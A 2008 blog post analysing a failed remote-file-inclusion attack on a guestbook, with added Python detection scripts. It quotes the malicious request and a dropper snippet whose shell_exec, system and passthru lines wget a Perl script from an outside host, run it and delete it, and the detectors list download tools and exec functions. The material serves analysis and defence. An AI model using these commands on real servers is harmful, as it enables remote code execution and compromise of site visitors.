January 7th, 2008
I want to state right off the bat that you needn't ever worry about divulging your IP address or any other information by coming to my website. That's because I am too cheap to get the advanced stats package from my webhosting company. So, all I get now is a gigantic impossible-to-read log of numbers that I never look at. And any data in it only lasts for 7 days anyhow—purged every Sunday. Visit any or all of my pages, download any or all content ... I won't know about it because I just don't care enough to make the effort to scour the mass of data to try and figure out who went where and looked at what. Life is just too short. Sorry, if that offends you, and you're welcome if you heartily approve.
Anatomy of a guestbook hack
I want to talk about something that caught my eye in my website's error log (something I check with about the same frequency that I wash my car, which is "very infrequently" :) ) It turns out that an automated tool went to my site and tried to install a link to a site that links to another site that scans people coming to my site for security vulnerabilities. Eh? (I hear you ask.) It's like this:
Step 1: Create a link to the installer code
OK, so as I said above, the only time I ever take notice of that log I mention is when something weird happens in it, and something weird most certainly did: Yesterday I got two requests in rapid succession for a PHP program (that doesn't exist) which looks as though it is part of a guestbook entry addition procedure:
/admin/addentry.php?phpbb_root_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 985
Since I wrote all my own homegrown code for my guestbook, the program it was trying to access doesn't exist, and the return code was 404 (as you can see). But if I did use the program addentry.php for my guestbook, and kept it in an /admin directory on my server (probably the default name and directory for some generic guestbook program), it would have responded to the GET request by adding a link to some code at another web address.
What the command was attempting to do was redirect my guestbook so that whenever people viewed the guestbook, it would attempt to run the script called phpbo.do at:
www.humanesociety.com/media/
I bet the Humane Society would be shocked to learn that their server had been hacked and was hosting some cracker code!
Fig. 1 - An attempt to compromise the guestbook by directly adding a malicious link.
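As an added example (not code from the original post), here is a small Python scanner that picks requests like the one above out of an Apache-style access log: it flags any query parameter whose decoded value is an absolute URL, and rates the hit higher when the parameter name looks include-related or the value carries the trailing "?" padding seen in that log line. The log lines, timestamps and the example.invalid/example.org hosts are constructed; only the first line mirrors the real request.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log lines in Apache "combined" format. The first one mirrors the
# request quoted above; the other three are made up for contrast.
SAMPLE_LOG = """\
69.61.30.100 - - [06/Jan/2008:22:14:03 -0500] "GET /admin/addentry.php?phpbb_root_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 985 "-" "libwww-perl/5.805"
10.0.0.7 - - [06/Jan/2008:22:15:11 -0500] "GET /guestbook.php?page=2 HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
69.61.30.100 - - [06/Jan/2008:22:15:40 -0500] "GET /index.php?inc=http%3A%2F%2Fexample.invalid%2Fx.txt%3F HTTP/1.1" 404 985 "-" "libwww-perl/5.805"
10.0.0.9 - - [06/Jan/2008:22:16:02 -0500] "GET /guestbook.php?ref=http://example.org/ HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
REMOTE_RE = re.compile(r"^(?:https?|ftp)://|^//", re.I)  # absolute or protocol-relative URL
# Parameter names that old PHP scripts commonly fed straight into include(); a URL in one
# of these is far more suspicious than a URL in, say, a referrer field.
NAME_HINTS = ("path", "dir", "inc", "file", "page", "root", "template", "lib", "conf")

def parse_line(line):
    """Return the interesting fields of one combined-format line, or None if it doesn't parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_rfi(line):
    """Return one finding per query parameter whose percent-decoded value is a URL."""
    rec = parse_line(line)
    if rec is None:
        return []
    parts = urlsplit(rec["target"])  # path and raw query string of the request target
    findings = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):  # parse_qsl decodes %xx
        if not REMOTE_RE.match(value):
            continue
        include_like = any(h in name.lower() for h in NAME_HINTS)
        padded = value.endswith("?")  # the trailing '?' run seen in the log line above
        findings.append({"ip": rec["ip"], "status": rec["status"], "path": parts.path,
                         "param": name, "url": value,
                         "confidence": "high" if (include_like or padded) else "low"})
    return findings

def scan(log_text):
    """Run find_rfi over every non-empty line; returns a flat list of findings."""
    return [f for line in log_text.splitlines() if line.strip() for f in find_rfi(line)]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['confidence']:4} {f['ip']:14} {f['status']} {f['path']} {f['param']}={f['url']}")
```

A "high" hit with a 404 is a probe that missed; the same hit with a 200 is the one to investigate first.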
Step 2: Install the malware
So I decided to look at the source code of the phpbo.do script. I won't burden you with all the code, but I will show a snippet to give an idea of what it looks like:
// Report where the script is running and what it is running on
$dir = @getcwd();
echo "BAGOL<br>";
$OS = @PHP_OS;
echo "OSTYPE:$OS<br>";
echo "uname -a; $uname<br>";
...
// Download the second-stage script into /tmp, run it with perl, then delete it
shell_exec('cd /tmp; wget http://www.paradiseradio.org/help/css/ciak.txt;perl ciak.txt;rm -rf ciak.txt');
...
// Same download-run-delete sequence, retried through system() in case shell_exec() is disabled
system('cd /tmp;wget http://www.paradiseradio.org/help/css/ciak.txt;perl ciak.txt;rm -rf ciak.txt');
...
// And once more through passthru()
passthru('cd /tmp;wget http://www.paradiseradio.org/help/css/ciak.txt;perl ciak.txt;rm -rf ciak.txt');
...
Here's the bulk of what it does:
First it displays some information about the Web Server hosting the code, including free disk space. I guess the crackers want to know how many resources they are able to steal.
Then it downloads some PERL script found on yet another server (http://www.paradiseradio.org/help/css/). I am sure, just like the Humane Society, Paradise Radio would be surprised and unhappy to learn they were hosting cracker tools. In the code I show above it uses the wget command. It also tries other download commands (lwp-download, curl, fetch, etc.) in case the host doesn't have one of them. This is so that the various different web hosts are all covered; if one line of code doesn't work, maybe the next one will.
Next, it calls PERL and executes that newly-downloaded script (more about that script below).
After that, it deletes the script off the server. See? It's cleaning up after itself to reduce the chance that someone in the Humane Society's IT department will notice unusual files on their server. (Their weblogs will show activity, but that might take hours, days, or weeks ... and by then a lot of malicious code could have been deployed.)
Fig. 2 - The malicious link placed in the guestbook calls a script on a hacked server, which subsequently downloads and runs another script from another hacked server to compromise the security of the computer visiting the guestbook.
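To find a script like phpbo.do sitting on a hosting server, here is an added Python example (not from the original post) that scans PHP source for exec-family calls whose literal argument chains a download tool, an interpreter and a cleanup, the download-run-delete pattern described above. The PHP samples are constructed to mirror the excerpt, with the download host replaced by the placeholder example.invalid.

```python
import re

# Constructed samples (not the page's files): one modelled on the phpbo.do excerpt above, with
# the download host replaced by the placeholder example.invalid, and one harmless contact form.
SUSPECT_PHP = r"""<?php
shell_exec('cd /tmp; wget http://example.invalid/help/css/ciak.txt;perl ciak.txt;rm -rf ciak.txt');
system('cd /tmp;wget http://example.invalid/help/css/ciak.txt;perl ciak.txt;rm -rf ciak.txt');
passthru('cd /tmp;wget http://example.invalid/help/css/ciak.txt;perl ciak.txt;rm -rf ciak.txt');
"""
BENIGN_PHP = r"""<?php
$name = htmlspecialchars($_POST["name"] ?? "");
mail("me@example.invalid", "Contact form", $name);
"""

EXEC_FUNCS = ("shell_exec", "system", "passthru", "exec", "popen", "proc_open")
DOWNLOADERS = ("wget", "curl", "fetch", "lwp-download", "lynx")  # tools the dropper rotates through
INTERPRETERS = ("perl", "php", "python", "sh", "bash")
# An exec-family call whose argument is a single- or double-quoted string literal.
CALL_RE = re.compile(r"\b(" + "|".join(EXEC_FUNCS) + r")\s*\(\s*(['\"])(.*?)\2")

def analyse_command(cmd):
    """Classify each ';'/'&&'/'|'-separated step of a shell string into dropper stages."""
    stages = set()
    for step in re.split(r"\s*[;&|]+\s*", cmd):
        words = step.split()
        if not words:
            continue
        tool = words[0]
        if tool in DOWNLOADERS and any(w.startswith(("http://", "https://", "ftp://")) for w in words):
            stages.add("download")  # fetches a file from a remote URL
        elif tool in INTERPRETERS:
            stages.add("execute")   # runs the fetched file
        elif tool == "rm":
            stages.add("cleanup")   # removes the evidence afterwards
        elif tool == "cd" and len(words) > 1 and words[1].startswith("/tmp"):
            stages.add("tmpdir")    # works out of a world-writable directory
    return stages

def scan_php(source):
    """Return (function, command, stages) for every exec-family call with a literal argument."""
    return [(m.group(1), m.group(3), analyse_command(m.group(3))) for m in CALL_RE.finditer(source)]

def is_dropper(source):
    """Flag a file when a single command both downloads from a URL and executes the result."""
    return any({"download", "execute"} <= stages for _, _, stages in scan_php(source))

if __name__ == "__main__":
    print({label: is_dropper(src) for label, src in (("suspect", SUSPECT_PHP), ("benign", BENIGN_PHP))})
```

Calls built from variables or concatenation are not matched by the literal-string regex, so treat a clean result as "nothing obvious", not "nothing there".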
Step 3: The payload is delivered
The text file that contains the code being downloaded from one server to another is called ciak.txt. Last night I downloaded it (as a text file only; I did not execute it!) and discovered it is a renamed version of a special program called a vulnerability scanner; this particular variety is named VulnScan v.10 (crackers, for all their devious minds, are clearly not the most creative geniuses when it comes to naming their scripts and programs—they are all business, which is actually kind of disturbing when you think about it). Here's a bit about these vulnerability scanners on Wikipedia. In short: They scan computers for security vulnerabilities and:
Report found vulnerabilities back to a specific computer at a specific IP address,
Exploit any of the vulnerabilities they are able to.
Aha, so now we get to the point. In cracker terms, this is "the payload". VulnScan is trying to probe the system of the person who visits my guestbook and tell the cracker (who set up this series of scripts) all about their computer (IP address, OS and version, installed security patches, etc.)
I won't show any of the code for this program at all, since it is too much like encouraging people. But, suffice to say, I read the code through and it is not a friendly little piece of code. If your system is not up-to-the-instant security patched, it might get a toehold and do something nasty, like:
Install a remote shell program or rootkit (gives crackers access to remotely forage through your hard drive for anything that might interest them).
Install programs that turn your computer into a "zombie", essentially turning it into a foot-soldier that attacks some other server (like Microsoft.com, Whitehouse.gov, Yahoo.com, etc.) overburdening them with requests, thus making them too busy to work.
Install a popup launcher so that you get constantly assaulted by popups for Viagra, Cialis, mortgage refinancing, or penis enlargement pills (no, I am not kidding).
Install a program that turns your computer into a "defacer"—that is, a program that attempts to hack into and destroy other websites.
Do you see how it would be your computer performing all these malicious activities after visiting my guestbook? Once the code was installed and running, you might notice nothing except a slow-down in your computer. And I would notice nothing at all unless I was actively looking for a compromised guestbook.
Step 4: Figuring out the source
So who is the arsehole responsible for this? Well, the short answer is: 69.61.30.100. But that isn't a whole lot of help, is it? :) And it's probably wrong anyhow.
69.61.30.100 is the IP address of the person who tried to install the link to the first server (which would try to install the vulnerability scanner from the other server). So I did a DNS Query and got this information:
69.61.30.100 resolved to alpha.webserverdns.com
DNS Query Results:
; <<>> DiG 9.1.3 <<>> any alpha.webserverdns.com
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5038
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 2, ADDITIONAL: 3
;; QUESTION SECTION:
;alpha.webserverdns.com. IN ANY
;; ANSWER SECTION:
alpha.webserverdns.com. 14400 IN A 69.61.30.100
alpha.webserverdns.com. 14400 IN MX 0 alpha.webserverdns.com.
alpha.webserverdns.com. 14400 IN TXT "v=spf1 a mx ~all"
;; AUTHORITY SECTION:
webserverdns.com. 14400 IN NS ns1.webserverdns.com.
webserverdns.com. 14400 IN NS ns2.webserverdns.com.
;; ADDITIONAL SECTION:
alpha.webserverdns.com. 14400 IN A 69.61.30.100
ns1.webserverdns.com. 172795 IN A 69.61.37.247
ns2.webserverdns.com. 172795 IN A 208.101.27.152
;; Query time: 89 msec
;; SERVER: 64.40.96.100#53(64.40.96.100)
;; WHEN: Mon Jan 7 13:25:40 2008
;; MSG SIZE rcvd: 207
Here is the WHOIS for that IP address:
IP Whois Results:
Connecting to whois.arin.net...
Global Compass, Inc. NET-GLOBAL-COMPASS (NET-69-61-0-0-1)
69.61.0.0 - 69.61.127.255
Trusted IP networks TRUSTED-IP-NETWORKS-69-61-30-0-24 (NET-69-61-30-0-1)
69.61.30.0 - 69.61.30.255
Global Compass, eh? And who are they? According to their website, they provide "Internet Collocation for enterprises that seek performance advantages and cost-efficiency through the strategic outsourcing of their IT infrastructure."
Also, they own a block of IP addresses, 32 thousand in total. Hmm, that fact and the bloated marketynge-speak they use to describe themselves make them sound like an Internet Service Provider (ISP). This represents a dead end in my search. They clearly aren't the guilty party—they're just hosting webservers and web application servers. Unless I am some law enforcement officer and can get logs from them to tell me who was using that particular IP address at the time cited, I'm out of luck. They won't tell me and, in many countries, ISPs won't tell anyone who their clients are and what they are doing with their computers, no matter who is asking.
And there is another thing to consider: Let's say that Global Compass Inc. did give me the name and address of the computer at 69.61.30.100 and I decided to contact the owner. It would probably turn out that they were completely unaware they were trying to seed my guestbook with links to malicious scripts; they probably got compromised some time in the past themselves, and their computers were turned into guestbook-seeding zombies.
If that were the case, then I would have to read through the same kind of log I cited at the top of this blog entry and start working backwards again. And maybe again and again and again.
Conclusion
So, you might think this whole exercise in vivisection of a set of scripts is pointless and futile, since the scripts failed on my website and I never found out who was perpetrating it. But the crackers wouldn't be doing it if it weren't successful on someone's site somewhere, so the investigation was helpful—for me at least—by shedding some temporary light into the devious minds of the folks who are intent on cracking into peoples' computers. It's not just criminal, there's a social aspect to crackers, too: They have given up on the regular societal upstream swim and have instead created their own counter-culture of rebellion and cybercrime. I don't say this with admiration, by the way, but they are clearly not stupid people.
In the end, there's not a lot to say about them, except that I wish they could see things from a slightly bigger picture: Guestbook hacking is two-bit penny-ante stuff, really. They know their way around scripts, and they understand the architecture of webservers (and related commands) so they could probably do some so-called honest work employed by ISPs or other such companies. I work around dozens of people with the same skills, and they drive nice cars and live nice lifestyles.
And they don't need to hack other peoples' websites to do it.